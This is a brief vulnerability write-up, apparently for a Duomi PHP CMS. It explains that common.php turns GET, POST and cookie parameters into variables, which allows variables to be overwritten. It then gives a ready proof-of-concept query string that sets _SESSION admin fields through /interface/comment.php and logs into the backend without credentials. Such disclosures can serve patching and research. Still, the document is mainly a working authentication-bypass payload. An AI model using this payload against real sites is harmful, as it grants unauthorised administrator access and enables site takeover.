1.Cause of vulnerability
The vulnerability lies in line 52 of /domiphp/common.php
The above code processes the user's get, post, and cookie parameters, using the above parameter names as variable names and parameter values as variable values. This leads to a possible variable coverage vulnerability (the function on the right is to escape double quotes and single quotes)
2. Exploiting vulnerabilities
Try to customize the session
First, insert the stub to view the administrator session
Find some pages that reference vulnerable files
for example
/interface/comment.php
Construct poc:
?_SESSION[duomi_ckstr]=jcfe&_SESSION[duomi_admin_id]=1&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=admin
Successfully log in to the backend after visiting